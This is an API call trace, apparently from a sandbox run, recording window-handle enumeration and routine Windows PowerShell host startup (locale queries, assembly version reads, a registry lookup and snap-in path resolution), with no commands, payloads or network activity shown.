	[0126.952] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc50
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x6024a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc4c
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x60242, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc48
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x9b4
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x8fc
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xbc0
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xb0
	[0126.953] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x804
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xbc8
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x854
	[0126.953] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x140
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x55c
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x34c
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xb40
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x988
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x868
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x850
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x830
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x814
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x744
	[0126.954] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x2a8
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x534
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5e4
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5c4
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x58c
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x238
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x584
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7e8
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x678
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x35c
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x51c
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x360
	[0126.955] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x274
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x588
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc8
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x21c
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x664
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x334
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5ec
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x550
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7a0
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x594
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x508
	[0126.956] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4ec
	[0126.957] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.957] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7ec
	[0126.960] WerSetFlags () returned 0x0
	[0126.967] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0127.096] CoTaskMemFree (pv=0x0) 
	[0127.097] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25dae0 | out: pulNumLanguages=0x25dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25dae0) returned 1
	[0127.097] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25dae8, pwszLanguagesBuffer=0x2d56380, pcchLanguagesBuffer=0x25dae0 | out: pulNumLanguages=0x25dae8, pwszLanguagesBuffer=0x2d56380, pcchLanguagesBuffer=0x25dae0) returned 1
	[0127.102] CoTaskMemAlloc (cb=0x24) returned 0x4a82f0
	[0127.102] GetUserDefaultLocaleName (in: lpLocaleName=0x4a82f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0127.102] CoTaskMemFree (pv=0x4a82f0) 
	[0127.123] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0127.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.124] CoTaskMemFree (pv=0x3f5ba0) 
	[0127.126] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0127.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.129] CoTaskMemFree (pv=0x3f5ba0) 
	[0127.131] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0127.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.131] CoTaskMemFree (pv=0x3f5ba0) 
	[0127.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.140] SetErrorMode (uMode=0x1) returned 0x1
	[0127.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25d760 | out: lpFileInformation=0x25d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0127.140] SetErrorMode (uMode=0x1) returned 0x1
	[0127.140] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25d9d0 | out: lpdwHandle=0x25d9d0) returned 0x94c
	[0127.292] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d59c10 | out: lpData=0x2d59c10) returned 1
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25d948, puLen=0x25d940 | out: lplpBuffer=0x25d948*=0x2d59cac, puLen=0x25d940) returned 1
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59d88, puLen=0x25d8b0) returned 1
	[0127.293] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0127.293] CoTaskMemAlloc (cb=0x2e) returned 0x4aa7a0
	[0127.293] lstrcpyW (in: lpString1=0x4aa7a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0127.293] CoTaskMemFree (pv=0x4aa7a0) 
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59ddc, puLen=0x25d8b0) returned 1
	[0127.293] lstrlenW (lpString="System.Management.Automation") returned 28
	[0127.293] CoTaskMemAlloc (cb=0x3c) returned 0x4b3370
	[0127.293] lstrcpyW (in: lpString1=0x4b3370, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0127.293] CoTaskMemFree (pv=0x4b3370) 
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59e38, puLen=0x25d8b0) returned 1
	[0127.293] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0127.293] CoTaskMemAlloc (cb=0x20) returned 0x4afc80
	[0127.293] lstrcpyW (in: lpString1=0x4afc80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0127.293] CoTaskMemFree (pv=0x4afc80) 
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59e78, puLen=0x25d8b0) returned 1
	[0127.293] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0127.293] CoTaskMemAlloc (cb=0x44) returned 0x4b3370
	[0127.293] lstrcpyW (in: lpString1=0x4b3370, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0127.293] CoTaskMemFree (pv=0x4b3370) 
	[0127.293] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59ee0, puLen=0x25d8b0) returned 1
	[0127.293] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0127.293] CoTaskMemAlloc (cb=0x76) returned 0x437ed0
	[0127.293] lstrcpyW (in: lpString1=0x437ed0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0127.294] CoTaskMemFree (pv=0x437ed0) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59f7c, puLen=0x25d8b0) returned 1
	[0127.294] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0127.294] CoTaskMemAlloc (cb=0x44) returned 0x4b3370
	[0127.294] lstrcpyW (in: lpString1=0x4b3370, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0127.294] CoTaskMemFree (pv=0x4b3370) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59fe0, puLen=0x25d8b0) returned 1
	[0127.294] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0127.294] CoTaskMemAlloc (cb=0x58) returned 0x400cf0
	[0127.294] lstrcpyW (in: lpString1=0x400cf0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0127.294] CoTaskMemFree (pv=0x400cf0) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d5a05c, puLen=0x25d8b0) returned 1
	[0127.294] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0127.294] CoTaskMemAlloc (cb=0x20) returned 0x4afc80
	[0127.294] lstrcpyW (in: lpString1=0x4afc80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0127.294] CoTaskMemFree (pv=0x4afc80) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x2d59d04, puLen=0x25d8b0) returned 1
	[0127.294] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0127.294] CoTaskMemAlloc (cb=0x66) returned 0x4ae500
	[0127.294] lstrcpyW (in: lpString1=0x4ae500, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0127.294] CoTaskMemFree (pv=0x4ae500) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x0, puLen=0x25d8b0) returned 0
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x0, puLen=0x25d8b0) returned 0
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25d8b8, puLen=0x25d8b0 | out: lplpBuffer=0x25d8b8*=0x0, puLen=0x25d8b0) returned 0
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25d888, puLen=0x25d880 | out: lplpBuffer=0x25d888*=0x2d59cac, puLen=0x25d880) returned 1
	[0127.294] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0127.294] VerLanguageNameW (in: wLang=0x0, szLang=0x4331c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0127.294] CoTaskMemFree (pv=0x4331c0) 
	[0127.294] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\", lplpBuffer=0x25d8d8, puLen=0x25d8d0 | out: lplpBuffer=0x25d8d8*=0x2d59c38, puLen=0x25d8d0) returned 1
	[0127.306] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d7a8 | out: phkResult=0x25d7a8*=0x308) returned 0x0
	[0127.309] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d76c, lpData=0x0, lpcbData=0x25d768*=0x0 | out: lpType=0x25d76c*=0x1, lpData=0x0, lpcbData=0x25d768*=0x56) returned 0x0
	[0127.310] CoTaskMemAlloc (cb=0x5a) returned 0x4ae490
	[0127.310] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d73c, lpData=0x4ae490, lpcbData=0x25d738*=0x56 | out: lpType=0x25d73c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25d738*=0x56) returned 0x0
	[0127.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.487] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0127.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.487] CoTaskMemFree (pv=0x3f5ba0) 
	[0128.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0128.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0128.774] CoTaskMemAlloc (cb=0x104) returned 0x3f5cb0
	[0128.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.774] CoTaskMemFree (pv=0x3f5cb0) 
	[0128.775] CoTaskMemAlloc (cb=0x104) returned 0x3f5cb0
	[0128.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.775] CoTaskMemFree (pv=0x3f5cb0) 
	[0129.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0129.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0130.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0130.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0131.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0131.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0131.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0131.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0131.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0131.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0132.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x25d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0132.700] SetErrorMode (uMode=0x1) returned 0x1
	[0132.700] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x25d700 | out: lpFileInformation=0x25d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0132.700] SetErrorMode (uMode=0x1) returned 0x1
